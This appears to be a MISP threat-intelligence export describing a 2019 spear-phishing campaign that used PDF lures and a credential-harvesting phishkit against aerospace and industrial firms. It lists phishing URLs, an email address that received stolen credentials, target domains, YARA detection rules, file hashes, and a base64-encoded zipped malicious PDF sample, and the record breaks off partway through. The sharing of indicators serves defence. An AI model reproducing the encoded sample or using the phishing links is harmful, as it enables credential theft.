|
{
|
||
|
"Event": {
|
||
|
"analysis": "1",
|
||
|
"date": "2019-05-16",
|
||
|
"extends_uuid": "",
|
||
|
"info": "Targeted phishing - PDF documents / phishkit",
|
||
|
"publish_timestamp": "1622024256",
|
||
|
"published": true,
|
||
|
"threat_level_id": "3",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd3938-7134-4908-9552-173cc0a8016e",
|
||
|
"Orgc": {
|
||
|
"name": "EUROLEA",
|
||
|
"uuid": "5cdc2cdd-bca4-4a76-8955-03cdc0a8016e"
|
||
|
},
|
||
|
"Tag": [
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Link - T1192\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#3bb800",
|
||
|
"name": "enisa:nefarious-activity-abuse=\"spear-phishing-attacks\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#004646",
|
||
|
"name": "type:OSINT"
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0071c3",
|
||
|
"name": "osint:lifetime=\"perpetual\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0087e8",
|
||
|
"name": "osint:certainty=\"50\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#33FF00",
|
||
|
"name": "tlp:green"
|
||
|
},
|
||
|
{
|
||
|
"colour": "#ffffff",
|
||
|
"name": "tlp:white"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558002233",
|
||
|
"to_ids": false,
|
||
|
"type": "yara",
|
||
|
"uuid": "5cdd3a39-84f0-4179-b3ea-173cc0a8016e",
|
||
|
"value": "rule PDF_LIFT {\r\nstrings:\r\n\t$a = \"Rect[ 195.05 428.59 411.79 489.67]\"\r\ncondition:\r\n\tall of them\r\n}"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Generic yara rule to find the common JAT author.",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012404",
|
||
|
"to_ids": true,
|
||
|
"type": "yara",
|
||
|
"uuid": "5cdd3a5b-3448-49d1-b35e-12a4c0a8016e",
|
||
|
"value": "rule PDF_JAT_AUTHOR {\r\nstrings:\r\n$a = \"<</Author(JAT)\"\r\ncondition:\r\nall of them\r\n}"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Email used to send credentials (found in the sendmail.php file)",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010661",
|
||
|
"to_ids": true,
|
||
|
"type": "email-dst",
|
||
|
"uuid": "5cdd5b25-5624-4404-b507-c170950d210f",
|
||
|
"value": "jatboss6@gmail.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010725",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5b65-9f28-4c2f-944e-444b950d210f",
|
||
|
"value": "https://lulufabllc.com/doc/cdnrg.com/index.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010725",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5b65-dcb0-49b0-bf70-4129950d210f",
|
||
|
"value": "https://helpersserer.com/wp-inc/Response/www.tenova.com/index.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010725",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5b65-5d90-4cdf-ab91-4355950d210f",
|
||
|
"value": "https://www.arbutusroutes.com/document/standardaero.com/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010725",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5b65-0804-4636-bffe-491e950d210f",
|
||
|
"value": "https://www.arbutusroutes.com/document/utc.com/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010725",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5b65-b1f0-4e0f-bf15-4c53950d210f",
|
||
|
"value": "https://www.arbutusroutes.com/document/gd.com/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558011379",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5dcf-4a6c-4843-94b3-4d49950d210f",
|
||
|
"value": "https://www.arbutusroutes.com/document/airbus.com/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-0e48-4b97-bb9e-43ff950d210f",
|
||
|
"value": "airbus.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-b678-4fae-bd00-4390950d210f",
|
||
|
"value": "tenova.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-29ec-42c0-936b-4d9d950d210f",
|
||
|
"value": "standardaero.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-713c-4eb6-adf5-4f3e950d210f",
|
||
|
"value": "gd.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-ab44-4ab7-be4b-4aa1950d210f",
|
||
|
"value": "utc.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-0b30-404e-a1c4-4479950d210f",
|
||
|
"value": "cdnrg.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Older phishing link where the login page was mirrored on Wed, 12 Sep 2018 06:29:39 GMT",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558013248",
|
||
|
"to_ids": false,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd6540-3188-4be6-8664-4555950d210f",
|
||
|
"value": "http://office.online-drive.ml/push-doc/cproduct_brochure_fg.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558013658",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd66da-91e4-49bb-a834-409b950d210f",
|
||
|
"value": "https://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558013991",
|
||
|
"to_ids": false,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd6827-982c-43af-9aa9-4212950d210f",
|
||
|
"value": "https://arbutusroutes.com/ssl/akhurst.com/index.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558014011",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd683b-6530-4b0d-a8de-40c1950d210f",
|
||
|
"value": "akhurst.com"
|
||
|
}
|
||
|
],
|
||
|
"Object": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558013350",
|
||
|
"uuid": "97bd5034-12a0-4c06-a779-de38deac6059",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "97bd5034-12a0-4c06-a779-de38deac6059",
|
||
|
"referenced_uuid": "76f9b382-c58e-46f8-b174-42275f764d3e",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a8-2960-49f9-b4b8-4316950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "5b241faa-dc1a-4c3c-884f-feddd4e660d7",
|
||
|
"value": "28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "ecc46363-2c17-4cc9-9cb2-ede7e6414048",
|
||
|
"value": "293456"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "entropy",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": false,
|
||
|
"type": "float",
|
||
|
"uuid": "8930e85f-68ff-4ad2-90ae-bed8577cb4c9",
|
||
|
"value": "7.9916395623958"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "0cd8fb23-ca95-492d-bb4e-cdab5a44c5ce",
|
||
|
"value": "9a58b7f8ba04c32c027126379456e444"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "dd9786d6-2f7c-476f-a6f2-c4d2933b9dcd",
|
||
|
"value": "b49d7b503f9e1cd1a22a4933fb1f1a1e0b56f214"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "daa2508f-f5ca-4528-8565-7f950dbd2690",
|
||
|
"value": "28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha512",
|
||
|
"timestamp": "1558002046",
|
||
|
"to_ids": true,
|
||
|
"type": "sha512",
|
||
|
"uuid": "574eb954-6ca4-40e5-858d-56a1d16d9c7d",
|
||
|
"value": "1717448f733024fcb9ea6d591115fb852fd59179c071939a3b1fe8ffb93985925646fb813a2d5828613d0c4494f1ffa3a04182569154fe42fbea1d9e9f5fd27f"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558002046",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "518d0da6-dddf-443c-bea5-193dd524d2d3",
|
||
|
"value": "28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02|9a58b7f8ba04c32c027126379456e444"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "mimetype",
|
||
|
"timestamp": "1558002046",
|
||
|
"to_ids": false,
|
||
|
"type": "mime-type",
|
||
|
"uuid": "b96aeb28-6672-41a0-a347-7ab32ce9a4f1",
|
||
|
"value": "PDF document, version 1.5"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ssdeep",
|
||
|
"timestamp": "1558002046",
|
||
|
"to_ids": true,
|
||
|
"type": "ssdeep",
|
||
|
"uuid": "1ec7e2a2-0b54-4352-ae04-1cbbc3bf5470",
|
||
|
"value": "6144:NsxJx6kEIUqWBT/jUcoXxC24MgppaAa2XFVzCCr1OHNw+4je6iMllP:Nsx/M3TLxer4M2sAa2VVpr1OH9Oe6HlJ"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558013350",
|
||
|
"uuid": "3a4f2299-8136-45ec-8927-223b672e4b88",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "3a4f2299-8136-45ec-8927-223b672e4b88",
|
||
|
"referenced_uuid": "dcd9ca51-3194-44ee-86a2-5f0cf9b923f8",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a8-f358-4be1-b8be-4159950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "f321a32c-70b0-4300-8fe8-89b02058b187",
|
||
|
"value": "56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "d33717e1-a1fd-4f1f-abf0-81dd122cf7ef",
|
||
|
"value": "283714"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "entropy",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "float",
|
||
|
"uuid": "0bee4ae2-3047-4cf1-87b2-25ea78a77c53",
|
||
|
"value": "7.9880939695683"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "4db6a162-7ac7-4093-9667-fd496af7e10f",
|
||
|
"value": "164db8d1fe5f2ea9dd3ea826b2f0b808"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "cb526992-0b24-4b7b-8255-db30b3ab5d26",
|
||
|
"value": "890efaa698f4d43aad15c3dbacb6c01544fd3e27"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "a145796b-37de-4d77-9427-61ded2c5dbaf",
|
||
|
"value": "56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha512",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "sha512",
|
||
|
"uuid": "e9769aca-b300-4331-85bf-34921987bc2b",
|
||
|
"value": "27c965d92b452d564917e5101cdd3c254347bf919c84be76b666335425e6673cb4a2553421b13841aaeafbf9a9e25ef37369b3d2a5bee208b4259da9053c1bb3"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "c0e50a57-4860-47c8-adfd-6c287c2d035a",
|
||
|
"value": "56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936|164db8d1fe5f2ea9dd3ea826b2f0b808"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "mimetype",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "mime-type",
|
||
|
"uuid": "30f320a6-a7ef-4d91-a736-c283b75f22ba",
|
||
|
"value": "PDF document, version 1.5"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ssdeep",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "ssdeep",
|
||
|
"uuid": "e92b5145-d834-44b1-963f-6dbc6706c690",
|
||
|
"value": "6144:xaYsXXzUbbQ+6K4R44u+aUg031qLD0AjJ1sGBIK/:xaTXX+iKO1u5uzK/"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558014535",
|
||
|
"uuid": "9608228e-4373-44ac-9fdd-bd37d5b02275",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "9608228e-4373-44ac-9fdd-bd37d5b02275",
|
||
|
"referenced_uuid": "9156df9c-4067-422e-bd38-8c3908e8ea5f",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a8-d778-48d2-a710-4be7950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "9608228e-4373-44ac-9fdd-bd37d5b02275",
|
||
|
"referenced_uuid": "5cdd63dc-0b30-404e-a1c4-4479950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd6a47-543c-43fe-b89f-447b950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558002048",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
